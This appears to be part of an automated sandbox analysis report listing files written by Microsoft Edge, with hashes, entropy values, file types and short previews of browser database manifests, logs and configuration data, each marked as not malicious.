                                                                                                                                                                                                                                                                                                  SSDEEP:768:h4FoOV7pLGLhOwWPEmfRH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVUV780UErwrSj1c:h4FoOjchOwWPEmfRHu1jaVV7XUdrSjkl
                                                                                                                                                                                                                                                                                                  MD5:A7A536FFADFC9CC205202C9210A0E327
                                                                                                                                                                                                                                                                                                  SHA1:EB903B0FD11FDD3FFE214F4C1C591A5BCC0E16BF
                                                                                                                                                                                                                                                                                                  SHA-256:2AD22265EA768B8510E4C3A8E85F363CDEB15B526FE91764AED08692D0D3EB36
                                                                                                                                                                                                                                                                                                  SHA-512:F7D7C5F38C085A774B95C4850E64DAE109B4CE554BB61DE289A58D4BE3162233E40733740F33EA73643C1221C37CF7A94981028454C004DF263246B93C262B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.188641322562199
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X3Usa1923oH+Tcwtp3hBtB2KLl34X3r+q2P923oH+Tcwtp3hBWsIFUv:BQYebp3dFLp2+v4Yebp3eFUv
                                                                                                                                                                                                                                                                                                  MD5:0E53B96401BCCDB6DDF1AD43ABFE46D1
                                                                                                                                                                                                                                                                                                  SHA1:58B6E532A63BFC1D3C0051230421290B66654DA9
                                                                                                                                                                                                                                                                                                  SHA-256:C7532D0DFDDA9265F4D727CDF09C41A28DA8BCC23F7444E4A41A9A25BEC0976A
                                                                                                                                                                                                                                                                                                  SHA-512:D36C7F93DB538D03C29A299C6C4884A741102B12688D3B738A8FAE55DF3335835875C42E2FFBFE5191F1479AFC4B36534A30B3DA766EF512E5FDC5E63CE47D28
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:26.212 162c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/27-01:01:26.286 162c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):2163821
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.222865924389114
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:v+/PN8FMfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8ufx2mjF
                                                                                                                                                                                                                                                                                                  MD5:3984AAD6AB16EA9F7CF6BE608F1A7320
                                                                                                                                                                                                                                                                                                  SHA1:F932770653FB5CBD7AED802AAEF00854705451B4
                                                                                                                                                                                                                                                                                                  SHA-256:3D4F8DD15DAA466EDA8AA51A4771245DF1B41AC25C7B6FF139FC50B86BFBE12F
                                                                                                                                                                                                                                                                                                  SHA-512:F6A9ED24BCD9F8FEF239377EE01BBCD4BB1822685EA0460DE38AB6FD2590EA9E4BDED345951100ABD2D5BE67174202F6D89D3C44DAB13096B6BA397244678480
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.107248348147677
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X1cTc+L+q2P923oH+Tcwt9Eh1tIFUt8U4X1cd311Zmw+U4X3uoLVkwO923oH+8:BicfL+v4Yeb9Eh16FUt8UicdH/+UWLVu
                                                                                                                                                                                                                                                                                                  MD5:04D07E2F489C7D51E63F6361C05F6C0E
                                                                                                                                                                                                                                                                                                  SHA1:68242C031EBA034330C91A4570F67C3F847097A2
                                                                                                                                                                                                                                                                                                  SHA-256:47B27FBEB36B0FEE69B7AF2C5F90A360A132780028EA14E42928C86F385173C4
                                                                                                                                                                                                                                                                                                  SHA-512:6FFBE56793948F681823713EBEFDFFB666C0D002F63959D0541A621B9476763415C848D0504A0FF5387F76EFFA0FD59BCD9FB773DD9A782664C2BA8D04D777AB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:26.096 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-01:01:26.098 1c7c Recovering log #3.2024/12/27-01:01:26.103 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4633205183813014
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5ifh:TouQq3qh7z3bY2LNW9WMcUvBu+
                                                                                                                                                                                                                                                                                                  MD5:154B87FA2C9B69E975F35C7F58735C2D
                                                                                                                                                                                                                                                                                                  SHA1:DE1006E5D0E706EE2AA61E9D10F4F0D8AD10A95C
                                                                                                                                                                                                                                                                                                  SHA-256:E61E8BCD195996D572E4AB989D92A9591AA443F7915B3F9317D41FD329532EC2
                                                                                                                                                                                                                                                                                                  SHA-512:5694C7096D95A6D02A745923B794CACD103FBE38461A52468E260D420573A133483968BA70D42A6ED6639B3A69993D24201576944C7A5005E780447AA849798B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                  MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                  SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                  SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                  SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):345
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.184463419444166
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4Xg+q2P923oH+TcwtnG2tMsIFUt8U4XgqJZmw+U4XO3VkwO923oH+TcwtnG2tM2:Buv4Yebn9GFUt8UMJ/+U1F5LYebn95J
                                                                                                                                                                                                                                                                                                  MD5:C6B2688D1C5C189A4B77E4EFF3CD22C3
                                                                                                                                                                                                                                                                                                  SHA1:C40225358871B354D444BB39A1499B5F34A9E1D3
                                                                                                                                                                                                                                                                                                  SHA-256:299D4AEF23814D0E1355C4C22ACBE0D0F0486B71C774439589D100D678EFB7B5
                                                                                                                                                                                                                                                                                                  SHA-512:36C27A54FBC160442A7697245B1145D64125FC89B19B2CA1946C04900A0C1AE66B2077A43121934534FB3EE964C1DD59012F8EECD795524A0F30E0318D1E7519
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.582 4c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-01:01:21.583 4c8 Recovering log #3.2024/12/27-01:01:21.584 4c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.613265655007497
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+j4nr3ppuLnrhmL:TO8D4jJ/6Up+0nzmnC
                                                                                                                                                                                                                                                                                                  MD5:929D5D9017E3B6F4A4D2A2F24AE53124
                                                                                                                                                                                                                                                                                                  SHA1:6B187E188FB2EC4E11B009EB55F00279EC3C3487
                                                                                                                                                                                                                                                                                                  SHA-256:9BFD94A97C2AEF0C5ECF46A6DC1C5D68DEAAD1A460E1E200BFEF8151E51CCE51
                                                                                                                                                                                                                                                                                                  SHA-512:2FB7B5EB934B972759770036F9C55F31880B1A81BA71B35704D507CAB1C94A8A040EE1F543F4CD1D7CCC715F4EDB135FADF52FFB940F8F7AC9A6168FF619B876
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:SQLite format 3......@ ..........................................................................j...%
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.354135659378303
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:kA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:kFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                  MD5:1BA354C756837C0C12B1CE122024AA3D
                                                                                                                                                                                                                                                                                                  SHA1:31B0AC678F4493BFDAEAC634681298A0B52365CF
                                                                                                                                                                                                                                                                                                  SHA-256:7F0681D3E5A9089F353438C4030997E82B7C57D0193FADE34AFA607C55C755DD
                                                                                                                                                                                                                                                                                                  SHA-512:47E74E604F44B77A0F08D0B9375E751B9319BCB26AEBB712A5D0786917A1565570FA60320684A796E7CFD498CD3D717F8C9F4DB2E09DA13F9188416BAA11344B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1...=q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379752889601783..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):311
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.138679595223296
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XZymRq1923oH+Tcwtk2WwnvB2KLl34XPTq2P923oH+Tcwtk2WwnvIFUv:BCymxYebkxwnvFLpSv4YebkxwnQFUv
                                                                                                                                                                                                                                                                                                  MD5:D7A6B7DE89D270618081597667697F7A
                                                                                                                                                                                                                                                                                                  SHA1:EE62B0DE02F2E8C941D3B72D9CE3871CB0AA953A
                                                                                                                                                                                                                                                                                                  SHA-256:EDB875158AACDBE18FEB24B5968F541242EA753D4F905B5A03E415A1A89C112A
                                                                                                                                                                                                                                                                                                  SHA-512:E0AA2828035EF6F28A3DA5C8693AE1C69B9E84CCE21D405064884896980AEF3AEADBB3009072636A2A738B45F851D9A8F94CAE4BDAD4AE700B1AFC160C74FB9E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:26.123 1c90 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/27-01:01:26.147 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.324623988271837
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RK:C1gAg1zfvy
                                                                                                                                                                                                                                                                                                  MD5:73272BC543527C49AA1BA50B340472BE
                                                                                                                                                                                                                                                                                                  SHA1:63EAAADE9DAA8B440FDC210C5BBE5747DDD72F82
                                                                                                                                                                                                                                                                                                  SHA-256:D65B923E5CCA8A2E787CBB679A5987CB3057CB40EC1CCF4CA93A70E251CA2F42
                                                                                                                                                                                                                                                                                                  SHA-512:3B190E4FE4275DEE4FE32EB2819BFF1FAE29F5D115105B203B545F8D1CBBD145C41B34D41376C7829842DB8060637DFEB6EF705024D7C33060F908ED4201139E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.146969706469028
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X4U8+q2P923oH+Tcwt8aPrqIFUt8U4XWWZmw+U4XdVkwO923oH+Tcwt8amLJ:BBN+v4YebL3FUt8UBW/+UcV5LYebQJ
                                                                                                                                                                                                                                                                                                  MD5:47EA98A9C562939DFA7D52D55591E370
                                                                                                                                                                                                                                                                                                  SHA1:168D19F035DA982C87319CD388A17B5A4D4F1E03
                                                                                                                                                                                                                                                                                                  SHA-256:1B88BD695978870FE71830D3DAEBD211AFFA6FD813F8E77AC3A9ECF489543095
                                                                                                                                                                                                                                                                                                  SHA-512:5CCFD403CA243611F1194DEB5514F50F0A5E3C0B3DBE65A796DB50ED8B092CB48EBE447BF766A6D93FDC1F69335C12B932DA77EEF38B32DC5A466B51A201BE3F
                                                                                                                                                                                                                                                                                                  Malicious:false
